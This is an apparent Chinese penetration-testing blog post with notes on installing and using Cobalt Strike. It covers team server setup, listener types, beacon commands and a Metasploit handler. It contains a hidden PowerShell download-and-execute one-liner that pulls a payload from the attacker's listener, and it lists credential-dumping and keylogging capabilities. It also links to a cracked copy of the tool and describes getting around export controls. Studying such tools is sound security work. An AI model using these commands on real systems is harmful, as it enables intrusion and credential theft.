<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="工具," />





  <link rel="alternate" href="/atom.xml" title="Hello_C技术博客" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.ico?v=5.1.1" />






<meta name="description" content="Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等。Cobalt Strike主要用于团队作战，能让多个攻击者同时连接到团体服务器上">
<meta property="og:type" content="article">
<meta property="og:title" content="Cobalt Strike学习笔记">
<meta property="og:url" content="http://yoursite.com/渗透/2017/10/27/Cobalt-Strike学习笔记.html">
<meta property="og:site_name" content="Hello_C技术博客">
<meta property="og:description" content="Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等。Cobalt Strike主要用于团队作战，能让多个攻击者同时连接到团体服务器上">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-27/38385816.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-27/28532677.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-27/47388596.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-27/29632476.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-28/7581397.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-28/46855327.jpg">
<meta property="og:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-28/28125408.jpg">
<meta property="og:updated_time" content="2017-10-31T00:57:18.996Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Cobalt Strike学习笔记">
<meta name="twitter:description" content="Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等。Cobalt Strike主要用于团队作战，能让多个攻击者同时连接到团体服务器上">
<meta name="twitter:image" content="http://obh1qcqek.bkt.clouddn.com/17-10-27/38385816.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 'undefined',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/渗透/2017/10/27/Cobalt-Strike学习笔记.html"/>





  <title>Cobalt Strike学习笔记 | Hello_C技术博客</title>
  












  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=1261655448&web_id=1261655448" language="JavaScript"></script>
  </div>





</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hello_C技术博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">一个小白的独白！</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/渗透/2017/10/27/Cobalt-Strike学习笔记.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Hello_C">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hello_C技术博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Cobalt Strike学习笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-10-27T11:45:22+08:00">
                2017-10-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透/" itemprop="url" rel="index">
                    <span itemprop="name">渗透</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/渗透/2017/10/27/Cobalt-Strike学习笔记.html#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="渗透/2017/10/27/Cobalt-Strike学习笔记.html" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/渗透/2017/10/27/Cobalt-Strike学习笔记.html" class="leancloud_visitors" data-flag-title="Cobalt Strike学习笔记">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count">℃</span>
             </span>
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计</span>
                
                <span title="字数统计">
                  1,894
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长</span>
                
                <span title="阅读时长">
                  8
                </span>
              
            </div>
          

          
          
		  
         
                <span id="busuanzi_container_page_pv">  |  热度<span id="busuanzi_value_page_pv"></span>℃</span>
         
        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>　　Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具，集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等。Cobalt Strike主要用于团队作战，能让多个攻击者同时连接到团体服务器上，共享攻击资源与目标信息和sessions。<br>　　<a href="https://cobaltstrike.com/" target="_blank" rel="external">Cobalt Strike</a>，据说现在最新版为3.9，主要分为试用版和付费版，试用版为21天，付费版3500美元，据说网上也有一些<a href="http://www.cnblogs.com/haq5201314/p/7040832.html" target="_blank" rel="external">破解教程</a>，<a href="https://pan.baidu.com/s/1qYocNbm" target="_blank" rel="external">cobaltstrik3.6破解版下载</a> 密码: 51tg。因为Cobalt Strike是美国对外限制型出口软件，只在美国和加拿大允许发售，所以我们需要google搜索下usa的个人代理来绕开限制。<br><a id="more"></a></p>
<h2 id="0x01-安装与运行"><a href="#0x01-安装与运行" class="headerlink" title="0x01 安装与运行"></a>0x01 安装与运行</h2><p>　　Cobalt Strike需要JAVA环境，需要注意的是JAVA环境不要安装最新版，否则会出一些问题，Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上，或者自己想要搭建的环境中，服务器端只能运行在Linux系统上。其中关键的文件是teamserver以及cobaltstrike.jar，将这两个文件放到服务器上同一个目录，然后运行：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./teamserver 192.168.3.32 test   #自己的IP和密码</div></pre></td></tr></table></figure></p>
<p><img src="http://obh1qcqek.bkt.clouddn.com/17-10-27/38385816.jpg" alt=""><br>　　说一下我安装运行时遇到的坑，首先：JAVA版本必须为8，否则就因版本问题无法编译运行；二：IP必须为真实IP，不能使用0.0.0.0或者127.0.0.1，这样也会报错的。<br>　　服务器端运行之后，我们就可以运行客户端了，客户端可以在Windows或者Linux下都可以。输入我们刚才IP以及端口、密码，用户名可以任意设置。<br><img src="http://obh1qcqek.bkt.clouddn.com/17-10-27/28532677.jpg" alt=""><br><img src="http://obh1qcqek.bkt.clouddn.com/17-10-27/47388596.jpg" alt=""><br>　　当攻击目标在控制台所操作的指令都会被记录到保留在Cobalt Strike目录logs下，对了，破解版是无法更新的。</p>
<h2 id="0x02-参数详情"><a href="#0x02-参数详情" class="headerlink" title="0x02 参数详情"></a>0x02 参数详情</h2><ul>
<li><p>Cobalt Strike</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">New Connection  #进行另外一个连接，支持连接多个服务器端</div><div class="line">Preferences  #设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录</div><div class="line">Visualization  #主要展示输出结果的形式</div><div class="line">VPN Interfaces  #设置VPN接口</div><div class="line">Listenrs  #创建一个Listener</div><div class="line">Script Manager  #</div><div class="line">Close  #退出连接</div></pre></td></tr></table></figure>
</li>
<li><p>View</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">Applications  #显示受害者机器的应用信息</div><div class="line">Credentials  #凭证当通过hashdump或者Mimikatz抓取过的密码都会储存在这里。</div><div class="line">Downloads  #下载文件</div><div class="line">Event Log  #主机上线记录以及团队协作聊天记录</div><div class="line">Keystrokes  #键盘记录</div><div class="line">Proxy Pivots  #代理模块</div><div class="line">Screenshots  #进程截图</div><div class="line">Script Console  #控制台,在这里可以加载[各种脚本](https://github.com/rsmudge/cortana-scripts)以增强功能</div><div class="line">Targets  #显示目标</div><div class="line">Web Log  #Web访问记录</div></pre></td></tr></table></figure>
</li>
<li><p>Attacks</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">Packages  #攻击包</div><div class="line">  HTML Application   生成恶意的HTA木马文件</div><div class="line">  MS Office Macro   生成office宏病毒文件</div><div class="line">  Payload Generator   生成各种语言版本的payload</div><div class="line">  USB/CD AutoPlay   生成利用自动播放运行的木马文件</div><div class="line">  Windows Dropper   捆绑器，能够对文档类进行捆绑</div><div class="line">  Windows Executable   生成可执行exe木马</div><div class="line">  Windows Executable(S)  生成无状态的可执行exe木马</div><div class="line">Web Drive-by  #钓鱼攻击</div><div class="line">  Manage  对开启的web服务进行管理</div><div class="line">  Clone Site  克隆网站，可以记录受害者提交的数据</div><div class="line">  Host File  提供一个文件下载，可以修改Mime信息</div><div class="line">  PowerShell Web Delivery  类似于msf 的web_delivery </div><div class="line">  Signed Applet Attack  使用java自签名的程序进行钓鱼攻击</div><div class="line">  Smart Applet Attack  自动检测java版本并进行攻击，针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本</div><div class="line">  System Profiler  用来获取一些系统信息，比如系统版本，Flash版本，浏览器版本等</div><div class="line">Spear Phish  #用来邮件钓鱼的模块</div></pre></td></tr></table></figure>
</li>
<li><p>Reporting</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">activity report  #活动报告生成</div><div class="line">Hosts report  #主机报告</div><div class="line">Indicators opromisef com   #目标报告</div><div class="line">Sessions report  #会话报告</div><div class="line">Social engineering report  #社会工程报告</div><div class="line">Export data   #数据出口</div></pre></td></tr></table></figure>
</li>
<li><p>help</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">Homepage  #官方主页</div><div class="line">Support  #技术支持</div><div class="line">Arsenal  #开发者</div><div class="line">System information  #版本信息</div><div class="line">About  #关于</div></pre></td></tr></table></figure>
</li>
</ul>
<h2 id="0x03-基本运行"><a href="#0x03-基本运行" class="headerlink" title="0x03 基本运行"></a>0x03 基本运行</h2><p>　　首先使用Cobalt Strike需要创建一个Listener，点击 Cobalt Strike-&gt;Listeners ，然后点击Add便可以创建自己想要的Listeners了，Cobalt Strike3.6包括<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">windows/beacon_dns/reverse_dns_txt</div><div class="line">windows/beacon_dns/reverse_http</div><div class="line">windows/beacon_http/reverse_http</div><div class="line">windows/beacon_https/reverse_https</div><div class="line">windows/beacon_smb/bind_pipe</div><div class="line">windows/foreign/reverse_dns_txt</div><div class="line">windows/foreign/reverse_http</div><div class="line">windows/foreign/reverse_https</div><div class="line">windows/foreign/reverse_tcp</div></pre></td></tr></table></figure></p>
<p>　　其中windows/beacon是Cobalt Strike自带的模块，包括dns,http,https,smb四种方式的监听器，windows/foreign为外部监听器，即msf或者Armitage的监听器。 选择监听器以后，host会自动填写我们开启服务时的ip，配置监听端口，然后保存，监听器就创建好了。<br><img src="http://obh1qcqek.bkt.clouddn.com/17-10-27/29632476.jpg" alt=""><br>　　在创建好监听器，接下来就需要配置我们的客户端了，Cobalt Strike提供了多种包括攻击方式，在这里我们使用Powershell进行攻击。<br><img src="http://obh1qcqek.bkt.clouddn.com/17-10-28/7581397.jpg" alt=""><br><img src="http://obh1qcqek.bkt.clouddn.com/17-10-28/46855327.jpg" alt=""><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&apos;http://192.168.3.83:8888/a&apos;))&quot;</div></pre></td></tr></table></figure></p>
<p>　　当我们在目标靶机运行上面这条Powershell之后，我们的Cobalt Strike客户端就会监听到我们的反弹链接，我们就可以看到已经有目标机上线。<br><img src="http://obh1qcqek.bkt.clouddn.com/17-10-28/28125408.jpg" alt=""><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div></pre></td><td class="code"><pre><div class="line">beacon&gt; help    </div><div class="line"></div><div class="line">Beacon Commands</div><div class="line">===============    </div><div class="line"></div><div class="line">    Command                   Description</div><div class="line">    -------                   -----------</div><div class="line">    browserpivot              Setup a browser pivot session </div><div class="line">    bypassuac                 Spawn a session in a high integrity process</div><div class="line">    cancel                    Cancel a download that&apos;s in-progress</div><div class="line">    cd                        Change directory</div><div class="line">    checkin                   Call home and post data</div><div class="line">    clear                     Clear beacon queue</div><div class="line">    covertvpn                 Deploy Covert VPN client</div><div class="line">    desktop                   View and interact with target&apos;s desktop</div><div class="line">    dllinject                 Inject a Reflective DLL into a process</div><div class="line">    download                  Download a file</div><div class="line">    downloads                 Lists file downloads in progress</div><div class="line">    drives                    List drives on target</div><div class="line">    elevate                   Try to elevate privileges</div><div class="line">    execute                   Execute a program on target</div><div class="line">    exit                      Terminate the beacon session</div><div class="line">    getsystem                 Attempt to get SYSTEM</div><div class="line">    getuid                    Get User ID</div><div class="line">    hashdump                  Dump password hashes</div><div class="line">    help                      Help menu</div><div class="line">    inject                    Spawn a session in a specific process</div><div class="line">    jobkill                   Kill a long-running post-exploitation task</div><div class="line">    jobs                      List long-running post-exploitation tasks</div><div class="line">    kerberos_ccache_use       Apply kerberos ticket from cache to this session</div><div class="line">    kerberos_ticket_purge     Purge kerberos tickets from this session</div><div class="line">    kerberos_ticket_use       Apply kerberos ticket to this session</div><div class="line">    keylogger                 Inject a keystroke logger into a process</div><div class="line">    kill                      Kill a process</div><div class="line">    link                      Connect to a Beacon peer over SMB</div><div class="line">    logonpasswords            Dump credentials and hashes with mimikatz</div><div class="line">    ls                        List files</div><div class="line">    make_token                Create a token to pass credentials</div><div class="line">    mimikatz                  Runs a mimikatz command</div><div class="line">    mkdir                     Make a directory</div><div class="line">    mode dns                  Use DNS A as data channel (DNS beacon only)</div><div class="line">    mode dns-txt              Use DNS TXT as data channel (DNS beacon only)</div><div class="line">    mode http                 Use HTTP as data channel</div><div class="line">    mode smb                  Use SMB peer-to-peer communication</div><div class="line">    net                       Network and host enumeration tool</div><div class="line">    note                      Assign a note to this Beacon       </div><div class="line">    portscan                  Scan a network for open services</div><div class="line">    powershell                Execute a command via powershell</div><div class="line">    powershell-import         Import a powershell script</div><div class="line">    ps                        Show process list</div><div class="line">    psexec                    Use a service to spawn a session on a host</div><div class="line">    psexec_psh                Use PowerShell to spawn a session on a host</div><div class="line">    pth                       Pass-the-hash using Mimikatz</div><div class="line">    pwd                       Print current directory</div><div class="line">    rev2self                  Revert to original token</div><div class="line">    rm                        Remove a file or folder</div><div class="line">    rportfwd                  Setup a reverse port forward</div><div class="line">    runas                     Execute a program as another user</div><div class="line">    screenshot                Take a screenshot</div><div class="line">    shell                     Execute a command via cmd.exe</div><div class="line">    sleep                     Set beacon sleep time</div><div class="line">    socks                     Start SOCKS4a server to relay traffic</div><div class="line">    socks stop                Stop SOCKS4a server</div><div class="line">    spawn                     Spawn a session </div><div class="line">    spawnas                   Spawn a session as another user</div><div class="line">    spawnto                   Set executable to spawn processes into</div><div class="line">    steal_token               Steal access token from a process</div><div class="line">    timestomp                 Apply timestamps from one file to another</div><div class="line">    unlink                    Disconnect from parent Beacon</div><div class="line">    upload                    Upload a file</div><div class="line">    wdigest                   Dump plaintext credentials with mimikatz</div><div class="line">    winrm                     Use WinRM to spawn a session on a host</div><div class="line">    wmi                       Use WMI to spawn a session on a host</div></pre></td></tr></table></figure></p>
<h2 id="0x04-与msf进行联动"><a href="#0x04-与msf进行联动" class="headerlink" title="0x04 与msf进行联动"></a>0x04 与msf进行联动</h2><p>　　在Cobalt strike3.0 之后不再使用Metasploit框架而作为一个独立的平台使用，但是我们还是可以做到与msf联动。 首先我们使用msf的reverse_tcp开启监听模式：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">msf &gt; use exploit/multi/handler </div><div class="line">msf exploit(handler) &gt; set payload windows/meterpreter/reverse_tcp</div><div class="line">payload =&gt; windows/meterpreter/reverse_tcp</div><div class="line">msf exploit(handler) &gt; set lhost 192.168.3.33 </div><div class="line">lhost =&gt; 192.168.3.33</div><div class="line">msf exploit(handler) &gt; set lport 5555</div><div class="line">lport =&gt; 5555</div><div class="line">msf exploit(handler) &gt; exploit -j</div></pre></td></tr></table></figure></p>
<p>　　之后使用Cobalt Strike创建一个windows/foreign/reverse_tcp Listener，其中ip为msf的ip地址，端口为msf所监听的端口，然后选中计算机，右键-&gt;Spawn:<br>选择刚刚创建的监听器：</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      Hello_C
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://yoursite.com/渗透/2017/10/27/Cobalt-Strike学习笔记.html" title="Cobalt Strike学习笔记">http://yoursite.com/渗透/2017/10/27/Cobalt-Strike学习笔记.html</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/工具/" rel="tag"><i class="fa fa-tag"></i>  工具</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/渗透/测试/2017/09/26/Linux渗透之OpenSSH后门.html" rel="next" title="Linux渗透之OpenSSH后门">
                <i class="fa fa-chevron-left"></i> Linux渗透之OpenSSH后门
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="渗透/2017/10/27/Cobalt-Strike学习笔记.html"
           data-title="Cobalt Strike学习笔记" data-url="http://yoursite.com/渗透/2017/10/27/Cobalt-Strike学习笔记.html">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Hello_C" />
          <p class="site-author-name" itemprop="name">Hello_C</p>
           
              <p class="site-description motion-element" itemprop="description">渗透测试  网络安全   web</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">64</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">21</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/zjwfc" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/5664757301" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  微博
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.dropsec.xyz" title="Drops团队主页" target="_blank">Drops团队主页</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://ctf.dropsec.xyz" title="Drops攻防平台" target="_blank">Drops攻防平台</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://fgp.dropsec.xyz" title="F.G.PNotes" target="_blank">F.G.PNotes</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://lyx.dropsec.xyz" title="lazy" target="_blank">lazy</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://byd.dropsec.xyz" title="Joy_nick" target="_blank">Joy_nick</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://wkh.dropsec.xyz" title="X加油,未来" target="_blank">X加油,未来</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://jdrops.dropsec.xyz" title="J_Drops" target="_blank">J_Drops</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://lzx.dropsec.xyz" title="凡尘" target="_blank">凡尘</a>
                </li>
              
